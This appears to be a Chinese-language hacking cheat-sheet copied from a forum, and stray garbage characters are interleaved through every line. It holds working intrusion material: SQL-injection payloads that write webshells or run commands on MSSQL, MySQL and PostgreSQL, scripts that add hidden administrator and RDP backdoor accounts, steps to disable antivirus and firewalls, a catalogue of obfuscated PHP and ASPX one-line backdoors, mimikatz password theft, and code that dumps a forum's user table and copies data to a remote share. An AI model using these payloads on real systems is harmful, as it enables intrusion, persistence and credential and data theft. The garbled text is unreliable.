   找到PID值所对应的端口, c0 W  |+ r  g& p8 H1 F" K( ^

5 R0 A/ K0 m8 z" r; h& k/ V& w+ w查询sql server 2005中的密码hash3 q4 F2 {1 w) `" k6 ~( R
SELECT password_hash FROM sys.sql_logins where name='sa'8 O  {' i2 L+ }3 Q1 D7 H- j
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
# A% D  g/ _( m) Zaccess中导出shell
( `2 w1 R. }  R# o$ Y* G% Q- {; Q3 }+ p3 P! n5 ?8 N2 \
中文版本操作系统中针对mysql添加用户完整代码:9 U" k3 D& M$ ^) Y! b" [# R
- i: w2 F! e( J/ `6 _$ \
use test;" w" Z8 ^! D5 j: R) ~4 J( A
create table a (cmd text);; c; L  g) m6 \: h1 n( [
insert into a values ("set wshshell=createobject (""wscript.shell"") " );% O+ E& T0 G9 q' R. H- O
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );# k. A3 h) z8 C6 ]6 x, Y5 z) ]  M
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );+ v  @. H( o' E7 r9 }, `
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
* o; c. R; w7 sdrop table a;: D) {4 _! Z9 X3 a! `! R& `

. k/ p& ^* }" C英文版本:; Q0 P" z( b: P& f9 J

  _& h' p, ]1 o( N0 [use test;0 a* A6 f" x" x
create table a (cmd text);
4 e( X( S3 X2 c3 W5 Rinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
7 I- l- E- @7 b8 r5 @insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );) _, ]1 j, O: F" o: h3 w' f' q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( Q' z/ [3 W, y8 |; ~0 L. rselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";6 j4 Q& P! i. E5 e
drop table a;
9 a$ n( e3 Y$ o, Y4 c, _" q
2 B$ k! E0 p/ L1 V+ F: |7 x0 Screate table a (cmd BLOB);
3 W/ k* s% k' T/ h0 u/ a2 e. sinsert into a values (CONVERT(木马的16进制代码,CHAR));/ }9 f! J! |( K
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'  k, r5 s& E4 a/ `
drop table a;3 T7 ~% M7 {! o5 l9 h

, s: G5 E- D8 ]) c记录一下怎么处理变态诺顿
/ u' N# h' G8 _% N: ]' A查看诺顿服务的路径: L# Y; d4 H; `3 i
sc qc ccSetMgr9 k2 W( [* g- m
然后设置权限拒绝访问。做绝一点。。
5 ]6 k5 C0 t. q; i' l9 l+ ~4 qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
  ?( ]. z2 N  u7 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"4 a, s7 G5 v+ r0 L& w( i/ Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ |2 R0 F' p6 e9 p) F% k7 k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone2 p" d: j+ J- s' X" \4 ~

6 S8 ^7 A) _+ |5 O然后再重启服务器: E& G; O/ l+ `0 [6 j7 m2 z
iisreset /reboot3 e/ e# _+ [5 [# B& W5 ~8 k8 s) n
这样就搞定了。。不过完事后。记得恢复权限。。。。0 L) Q/ c; j7 p/ e  D4 s  v: n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F& J4 ]. Q/ V5 a3 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F1 V4 T+ o& |5 W+ n- Z; B+ k. D& V8 V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
/ j0 x  K! z. v( `5 b4 \5 D" {0 ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F& [/ r6 z5 I8 z
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin* h0 \0 K) Y7 q7 T9 v  i; M: E: b

" H5 n! }% J# H- QEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
% f# v" I3 _( ?7 y: J1 y$ s7 `6 n4 T; Q6 ~. Z  G  X# U# {# G6 n
postgresql注射的一些东西
7 j1 \, M  r" `0 x. d0 _如何获得webshell
2 q  M, P& t% E0 U+ vhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
* K) q; D3 Z  F; Q* thttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ( E. w2 ~7 U5 Z
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
+ b# o% Y! {' D) u  j- H, o' N3 y如何读文件& N9 A% \# h% u( X% c5 b) J" b- N
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 j: L6 H7 o& {) n+ P6 h* qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
! k! s* j. j9 R& p# T1 m; Mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
5 E% e1 n* F% T$ O8 I0 j! n+ J  j( o0 l2 \5 Z# |& ~5 C
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。' a, r9 P! {- ]& c# r: ^; J
当然,这些的postgresql的数据库版本必须大于8.X
& M- w+ F7 `& `: s! i; M/ A2 h; n创建一个system的函数:
7 l! i4 @8 O, \CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT8 w$ t5 \: ?& n1 v9 b( }

1 i/ B1 ]7 [6 e8 Q: Z* H创建一个输出表:, Q3 B9 d7 r- O/ }" O+ ^; `! k; q
CREATE TABLE stdout(id serial, system_out text)
3 k  j1 U) R7 H2 i% C+ i/ N; Z9 y( j1 l- N- k' y
执行shell,输出到输出表内:
. x) V1 ~  Y8 b5 uSELECT system('uname -a > /tmp/test')9 u+ s3 ?: B- w/ W

$ X8 T; v. Z$ Z4 R0 {& zcopy 输出的内容到表里面;
  j- M  h& M8 a8 q) d  W6 H$ M# hCOPY stdout(system_out) FROM '/tmp/test'2 b: E% Q% @+ P7 |1 Y5 g7 g
. `/ o5 X6 f/ y+ H* X# i, y5 F
从输出表内读取执行后的回显,判断是否执行成功- P- Q8 |+ Y( ~. @( Z. {

9 ^* u: T6 B6 Z9 X9 s4 W, ISELECT system_out FROM stdout
/ d1 g$ b& R! h# {8 Y下面是测试例子
( Q+ F/ r* q4 X( p" V
. ]9 K2 `, E. ~3 d4 s/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. |/ @0 N3 M- B  ~' e) Y8 [. \6 ?
% o, B( U# x8 i& t+ P% H/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
9 f0 ^& u# ^# s! U. S4 @4 w9 ISTRICT --
+ ~" c* D4 c+ j- F0 f1 H
: h7 W6 z* U  R: l6 `, _9 v/store.php?id=1; SELECT system('uname -a > /tmp/test') --$ ?& S9 q; o( A0 ?, g
- ^8 M; M! `0 u; u
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --" k( w. m5 J4 O. d" \

2 p$ T9 B$ [5 i/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--9 |9 l4 p& P2 L7 n4 t( B
net stop sharedaccess    stop the default firewall
6 d, \& Z) M+ enetsh firewall show      show/config default firewall- K6 i; D* p  ?. y
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall/ H% l6 H/ m) F/ ^# N4 O6 Y1 `# p. z
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
4 p5 }, U7 C* z0 J7 ]: ]' S! B! A修改3389端口方法(修改后不易被扫出)
. U4 r. t& u5 D修改服务器端的端口设置,注册表有2个地方需要修改3 U- h: ^4 @4 o3 J3 m8 O
1 ]6 K0 J" i- p- w7 F& V* W/ G
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]1 a& r% z, U# t. I, `; O3 I
PortNumber值,默认是3389,修改成所希望的端口,比如60006 m' j1 ?' B! G0 V
. c$ u' R+ H% S' P2 i+ K
第二个地方:8 W4 V2 @, K3 W5 K/ C9 K- `. k
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
0 G! m& W) a, [PortNumber值,默认是3389,修改成所希望的端口,比如6000  z- K/ ]# n* L0 x

! l: ]6 u" Y' ?4 I  ?* h0 C现在这样就可以了。重启系统就可以了
/ ?! r. x0 Z4 b9 h6 x( l  k8 I! o& f* J
查看3389远程登录的脚本4 ~. I) L) h2 Q9 F6 v  N# Q  i
保存为一个bat文件
6 U; r$ t: s- i% o! I# mdate /t >>D:\sec\TSlog\ts.log
+ v2 S3 d. `. \* G8 Q; `( ]time /t >>D:\sec\TSlog\ts.log6 i  H+ N+ \/ V* j2 I5 R0 A7 R
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
2 f4 }* j7 g! Gstart Explorer
/ G3 ^1 p. f' {: u! {. S2 o  h; v+ S% N! R: u* Y; n
mstsc的参数:
5 r" Z* v9 w2 [$ q: ~$ r( S2 b4 _# O6 O
远程桌面连接
' ~$ u6 K3 {2 n" Z; A$ ^0 v; q  [
- f) m/ N5 z/ wMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
* ^! k6 n$ w& }" E: R  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?2 X0 Y9 P3 U( E0 e1 g+ u
" M5 {& b. A% Y; f0 C4 \
<Connection File> -- 指定连接的 .rdp 文件的名称。
" A9 l. u0 M9 |( y3 G
: M$ i& |$ N4 q: J, h" ^. u/v:<server[:port]> -- 指定要连接到的终端服务器。1 l* A( W6 K# [3 p5 E

  m4 N8 P, T' }) E! ^( g/console -- 连接到服务器的控制台会话。, s0 B! J) r6 A, {, p
) V. h7 w; I# w# }3 e& p
/f -- 以全屏模式启动客户端。- V: I: [% [# H) K, j' b
% r1 u/ g* P3 n1 D# T& o7 G  @
/w:<width> --  指定远程桌面屏幕的宽度。
9 W1 h/ ]$ ]/ T0 y2 _5 i! R: R6 N: j, r; \# n) }
/h:<height> -- 指定远程桌面屏幕的高度。& Z! f" a& G0 n% }

3 n2 n' o! M7 |% a5 n/edit -- 打开指定的 .rdp 文件来编辑。0 T8 M) s" _) C
/ W5 b( Z  [" f  V5 Z$ f  z* C
/migrate -- 将客户端连接管理器创建的旧版/ {! C8 t8 O% |) U0 P& X
连接文件迁移到新的 .rdp 连接文件。
  m/ {9 d# V+ x" B' H: {% Z9 R! _% m9 F# W) u7 n
3 P' T  M$ E$ d  {6 Z' r6 S" e
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就& B! ~( D+ E' W' t3 @3 b# o6 M
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. C0 T6 ?% d6 y$ r" P% F% h
6 c9 {/ ~8 ^9 ]3 n( D. ]2 N  o命令行下开启33898 ^" G8 }: |$ a6 g* I$ b% I
net user asp.net aspnet /add( V9 s7 L. ~( ]. H. V
net localgroup Administrators asp.net /add
7 q' P5 x% U, _1 N1 e' d8 ~8 A2 N2 unet localgroup "Remote Desktop Users" asp.net /add* S  e4 S: H: [% q
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 [- y9 s4 e1 K0 H" Yecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
4 C. A! _, v8 s2 V6 B8 r* u- Eecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1' r! o0 L5 x  n+ C% Q. L- Q9 p
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f5 N4 K& z1 Y; f# J- r- V
sc config rasman start= auto" X6 g6 ]$ I( D7 U
sc config remoteaccess start= auto0 K' [/ R1 W# Z
net start rasman
8 J( U1 ~/ ~1 ?6 znet start remoteaccess
0 Q6 r0 q8 J$ h/ a: d& MMedia/ d6 p5 D- u* {( r# k
<form id="frmUpload" enctype="multipart/form-data"
- l& x; \0 W% |4 J7 `9 Iaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' j( p7 T( u. C. p/ _
<input type="file" name="NewFile" size="50"><br>8 d, S3 H( Q1 s* Y
<input id="btnUpload" type="submit" value="Upload">
% {, E' Q; k# u5 d9 y  d</form>. S6 d6 e. H+ X  T; ?7 A

) k# s! d# p0 o" u* F+ U0 Acontrol userpasswords2 查看用户的密码
: ]+ Y0 s; U* T8 p1 Z' [  Taccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径' g' c5 F4 E& [  R
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a  H; o) ]# Y1 l1 j& I9 `* A+ S

6 e0 K. t$ S$ B" g) y& J141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:1 \/ W# Q3 s7 c
测试1:. I2 ^$ P7 y+ m: G! A: \: [4 B
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% @3 P+ p& k9 B' U' C, F: N- j4 t
3 e* k. ^/ W( }& u% c测试2:: s( J. R' p6 r  u
7 V9 {% R7 f1 @4 c6 E& |
create table dirs(paths varchar(100),paths1 varchar(100), id int)7 D. g. w+ k: i' @$ n: }% u

6 W' g/ |0 N( Q5 K  T5 kdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
* ]0 c! `5 G. B- P
0 Z* D$ \6 T! C4 hSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( |, v& r* ?' d' t2 k4 k关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
! l" F6 S1 X6 N0 X可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
1 n% {! S) O; s7 Z, T+ E7 cnet stop mcafeeframework- x  n5 q- ?" r2 Y
net stop mcshield
8 i" H  v$ H2 u8 Enet stop mcafeeengineservice& n8 w6 _1 N; n# h) Q
net stop mctaskmanager6 |' o. f9 k, F9 s; _! ?
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D0 C4 g4 l; `: }3 i3 ?
3 t, [/ ?- j8 B* o
  VNCDump.zip (4.76 KB, 下载次数: 1) 6 _6 }- n" a9 H$ ]7 O& P
密码在线破解http://tools88.com/safe/vnc.php; b, e3 F0 V: h( ~
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! ^' b1 A% X* r  D
! U3 ^+ Y8 M1 X% k% Y9 @
exec master..xp_cmdshell 'net user'
% D) }1 s- B8 U* Mmssql执行命令。
: K  ]5 V7 y; R2 O9 g  M5 Q3 `获取mssql的密码hash查询
1 m8 T) ~& x2 s- I2 Sselect name,password from master.dbo.sysxlogins
; o" w) j, P% A" F4 P
' r# c/ X0 ~" z; u9 T, r' `. `7 Qbackup log dbName with NO_LOG;
9 F7 k- C: ?; ^5 J' X) v4 j3 Gbackup log dbName with TRUNCATE_ONLY;7 Y4 W, `' M3 C% M2 p
DBCC SHRINKDATABASE(dbName);
) y5 y8 U7 a' V1 Pmssql数据库压缩" Y9 e. @4 t- E$ y! _5 w

( a2 n0 D& |* I. A$ y! JRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
/ w- E; ]: M; k将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。' G! e' {# w% U( e. p' [

9 F, X  Z- i8 ~) w& t3 Q& g2 Sbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'2 _* Z* F/ g4 D5 ?4 B' d
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak5 u3 h9 ^8 Z0 W1 W9 j- j, B
6 B) [' Z& Y1 v
Discuz!nt35渗透要点:
4 R& {# ~, c/ `3 m(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default! I# w8 e7 V' F  q0 m
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
  H. U, v6 r* D  ^- U1 X% o(3)保存。2 C/ E: x+ u! N4 f3 x4 y1 E
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
) g# i* m4 n4 Z* P( Xd:\rar.exe a -r d:\1.rar d:\website\& p$ Q1 I: ^1 P
递归压缩website
" S* Z9 m# |5 i$ |0 B4 Q, p5 g注意rar.exe的路径
6 x. n7 ]# [" p3 x9 x% l5 h! I* D; V% Z& |* p: Q  ^/ [2 z) g
<?php
* I9 {' H! C( U& T6 W5 Z2 V4 N0 X5 Z, j3 k
$telok   = "0${@eval($_POST[xxoo])}";
1 D5 i, }3 q5 q: l5 h4 L7 ~, A+ p8 Y6 W1 ?/ ~% S
$username   = "123456";
; z" d. E/ p$ C5 l. [/ T) c& h9 w
  E( d+ \( l% v8 @$userpwd   = "123456";
! I$ j, R" n& O$ X: ^$ z; n
& U2 \- l1 T/ K! H* \0 t$telhao   = "123456";' d5 ]# y( ~+ f' r2 C, |2 ?% h
+ @" H. I2 }" {* Y" p" O7 ~
$telinfo   = "123456";: t' O4 ~) k9 ?5 g5 I
5 a$ n" O) G- A& Q: r. G, g
?>
( `9 G4 k" J/ `" lphp一句话未过滤插入一句话木马/ H9 \3 `, t* q* v0 U: K  c

7 v+ k' A  b/ V6 w8 G: i2 z" o5 B站库分离脱裤技巧+ H& k( |3 O, C  |
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'; O" f% L  m6 b2 H6 E
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
3 |% |- Q" X. z( `$ P条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。+ b7 ?9 @$ z, F) x, q. {9 e4 p1 P
这儿利用的是马儿的专家模式(自己写代码)。
1 l! ]: ~- l  v, \4 E4 q  yini_set('display_errors', 1);$ K$ @. l3 X* T: ~2 ]9 i1 C- Q
set_time_limit(0);* G$ X  K- c' f
error_reporting(E_ALL);) g+ X8 l3 v+ V0 F6 e3 w
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
% h% l- T. W. J' W. P% w2 ]+ imysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
+ F* j" S  |* m, M$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; m( |9 l3 s1 R! Q& P+ J$i = 0;1 h' x- f5 A0 R8 M
$tmp = '';7 }( A' H! @( H2 q6 _
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {# I" X6 v# x, G# H5 M0 Q2 J
    $i = $i+1;
  f+ s2 E- S: O3 [" `% O7 |' e# ]    $tmp .=  implode("::", $row)."\n";
/ A' R0 ^* X2 X  p* A    if(!($i%500)){//500条写入一个文件
! b2 ]4 e; t7 D! x: p! l( K5 z        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
+ z! W! a- c# n; X. X        file_put_contents($filename,$tmp);4 F! g, O: g  }4 y
        $tmp = '';
  I' J  J' h! Q3 K% U& K: g    }
8 |- W! F9 d& m$ i  }* e}
2 S# r6 Y- w" ~% `" E! k7 Zmysql_free_result($result);; W7 G% C- M5 R

. p( M5 c9 ~! S; t0 T6 x, B6 L7 X) ]' l7 `% n) Y1 V! k' ?7 v

5 m& @- S  P' x) W4 i1 K//down完后delete
( o# H* {0 I$ j' D$ A
# R+ [0 c4 \- i, y( l
/ q. ~! L5 Y0 D9 T. ^( x0 Fini_set('display_errors', 1);
; x, U2 z" h; t1 xerror_reporting(E_ALL);$ g7 j: v, o7 Z# P- W* }
$i = 0;8 W* Q# R2 ^; @+ x8 S
while($i<32) {
) K6 M0 U1 D5 v$ V& c. k    $i = $i+1;  ?* s# H2 r& e  }
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
& ~, a8 ]% R* z; ~2 S2 S        unlink($filename);
% Y; E9 h* i& W; o/ U} ) X1 [9 e/ a$ @! x) `6 p0 e
httprint 收集操作系统指纹* Z: S- ]8 X7 w6 Y0 N" R& ]4 X. ]
扫描192.168.1.100的所有端口! T) F0 A/ N' m5 v0 g# {
nmap –PN –sT –sV –p0-65535 192.168.1.100$ k0 p0 {! U- X7 D; x
host -t ns www.owasp.org 识别的名称服务器,获取dns信息! \! E1 }( y, {' b" _
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输; y9 C. J; }6 q# n, Y2 E
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host% W" w8 F; Z+ v  }6 l
0 P# K( ]/ J. a( v& a: O
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)0 o* d/ m; @8 t3 T, K% w6 u- a0 j

1 u$ {, `' M) K# z3 {2 j2 F* t  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
) ^  c( T5 J: y! h. f3 W" e
. V/ t- F6 z- S, N; M& a4 Q  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x/ x6 w. {6 V2 B' Z) ?6 A) S( Q$ E

7 r$ e* t! g; P# v( e+ B. Z  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用), r4 }9 }9 a6 y

7 B  S$ f* g- h* h& c/ i1 H  http://net-square.com/msnpawn/index.shtml (要求安装)# c) u# t  I  h& h
$ D( i4 i  d: M
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)/ h2 w* u; ^) S# ^! a6 Z; E
6 s; P; C; j( G3 [5 F/ O0 ~
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
+ b2 F. v+ A% T' |set names gb2312
5 M  ?* i: ?, o; S" A导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
- a% A9 D$ D: Y0 u* b7 N. G0 _6 R& c# p3 Y! V1 A* j
mysql 密码修改: T, X) c6 m" P8 [5 F$ m
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
7 f# E3 F0 L  h. iupdate user set password=PASSWORD('antian365.com') where user='root';
' U% B2 M* ?, @/ _3 z! tflush privileges;& ]  ?  Y3 I8 X% l
高级的PHP一句话木马后门8 Q+ L" `+ w- E0 Y; m7 B) U

( Y) U' q$ S6 t入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
! ^7 X4 g6 e- X# a6 Q) i- T8 R
: Q2 P7 {2 P9 z9 L3 k. n) k# }1、
1 `3 [( }% i# k  G5 H
4 S1 i( C$ s7 `4 j" {" L$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
' l1 a2 C+ C& m- `
5 F/ _- G  O& D+ M4 {$hh("/[discuz]/e",$_POST['h'],"Access");
# c8 T% F$ |) E0 I4 f
6 s8 ?' a$ S* f% o//菜刀一句话2 z- p. v5 T3 k1 U; r6 ~
, E% c: `+ `; J" W2 \& o6 A
2、, X& J( J5 f; r7 }' y: Q6 B: O

6 V) j$ g; L9 I3 y0 j# R$filename=$_GET['xbid'];
# }& B& V) `! h4 V+ h1 H5 n3 ?0 ]
7 B% L7 w$ a' V; }2 d  Iinclude ($filename);4 Q6 f4 E% \' z$ z

1 y" E' \- U- [1 V8 P! k# w- @//危险的include函数,直接编译任何文件为php格式运行& t, P" g, T6 Z( ?$ N5 m& W) C

; ?$ \8 E( n* o! T1 `& m  B+ g3 ^3、$ l2 a+ V# M! D) e6 o+ l

2 e" N% M/ _# [  V& v7 @$reg="c"."o"."p"."y";/ f1 h6 T; g: Q% N: Z

, {4 X) _8 l5 ?$ r9 ]* m$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
& m! N* W: ?1 d2 Q( p
4 k" c" t$ Y* b9 W- }) Y//重命名任何文件. r! \/ x9 C# M3 ^7 S4 S, l# N# }2 M
! \/ t2 F. I2 y# S) {
4、% O) {2 w$ s' X9 O! [
& Y: l! k5 U/ k/ W& ^( \& v
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";5 [; w" k' H2 V  U1 U

0 z8 }8 o" i+ i/ J6 Z9 H$gzid("/[discuz]/e",$_POST['h'],"Access");
( C! `# j9 q& Z8 M& U8 p5 X$ H8 d
! z7 h. S" K& H1 R" H" x: r$ F//菜刀一句话3 M; V( n* b3 z" O$ d: h4 ~

+ R, |# s' Y1 u. D' c# I5 a5、include ($uid);* [9 G* ]% @: I, n* ]2 A7 o
8 D4 m0 `0 |% A" v0 ^/ @
//危险的include函数,直接编译任何文件为php格式运行,POST 9 z/ {4 h1 i+ N: c: y5 i

1 o& `% o' u# @, i; I7 r  R
6 H# ]0 [$ m! @6 E) j, G) Z//gif插一句话) C& a. R* V0 A' E' @% c

, |- y6 @2 @7 A& B6 `6、典型一句话! Y8 Z; D* P+ k1 M9 P' Z
1 |* H6 S! d! v8 G6 ?0 G% h# K$ U
程序后门代码* d% I& y( i  t2 x+ X
<?php eval_r($_POST[sb])?>
; |- m5 w  u" K( D程序代码
  k/ P' `# Q" U( X9 u5 Y( H. E+ s, Q<?php @eval_r($_POST[sb])?>
( u! a: ]; f7 {# Y0 x: {0 ~//容错代码
5 t4 p4 S7 s( [. k2 g程序代码% R' _. S0 K3 S5 d/ G5 R
<?php assert($_POST[sb]);?>' A& J. t6 P. `/ t
//使用lanker一句话客户端的专家模式执行相关的php语句2 f7 d2 b* R& o
程序代码
/ ^( i: N( y# O. U- }<?$_POST['sa']($_POST['sb']);?>
* W  n. d, T. `3 T0 T程序代码
3 K% J  {, N" d- k4 C<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
  B  w& P& C7 l( J程序代码
! [1 z) e! G5 ?* t  X) _<?php4 w# o' f3 P& N& i* O: z
@preg_replace("/[email]/e",$_POST['h'],"error");
0 x: J3 ]- |# N7 J?>
# K. x' T" s2 F# p//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
. y9 Z- n9 E6 ~' @$ s8 ?: m程序代码
' i8 d' e; e9 l5 W<O>h=@eval_r($_POST[c]);</O>
1 I$ J) j* Z$ {6 R; L+ ^' N程序代码1 o* A7 |& n; l1 h& u
<script language="php">@eval_r($_POST[sb])</script>) \( ^4 W& T5 Y; f9 D
//绕过<?限制的一句话
% g' w6 p9 L+ v2 m% J/ S: r7 D
, J2 {/ a- H8 t$ {- r* G) Chttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
+ W( e# a1 ?& i- a: \详细用法:* J4 w( c0 s& e  C
1、到tools目录。psexec \\127.0.0.1 cmd
- I: S4 ?9 T% T& V  a& S+ M; s: S7 s+ P2、执行mimikatz
2 J2 @8 o! j5 f0 u3 ]" b* d3、执行 privilege::debug
+ W" j; D- U4 J, f& |7 b4、执行 inject::process lsass.exe sekurlsa.dll
( e: H; V) d" }; p2 l5、执行@getLogonPasswords2 U* @2 s8 z1 ?+ c/ G3 }, l  {
6、widget就是密码
% |$ o) G6 [1 r' Y# m7、exit退出,不要直接关闭否则系统会崩溃。; b, x3 n  F. l1 U$ g. p5 @

0 F& u# N" N  _http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
% k9 `* k9 u) }6 f, Y6 [( [; G: ^2 e$ e3 b9 w
自动查找系统高危补丁6 Y; P8 a9 F3 b* a6 ~4 G
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt7 c/ g: x4 \# E8 ^$ K

: n% h" y/ n' D& v: m  i突破安全狗的一句话aspx后门* ?5 I2 P1 P4 S7 ~7 b' l3 D) v7 D
<%@ Page Language="C#" ValidateRequest="false" %>, Z3 k$ b6 |  P$ V+ q, i7 g0 z! h
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
! j) n& I6 L" awebshell下记录WordPress登陆密码
* q+ D9 ~( i1 o6 p4 \7 I2 B4 mwebshell下记录Wordpress登陆密码方便进一步社工
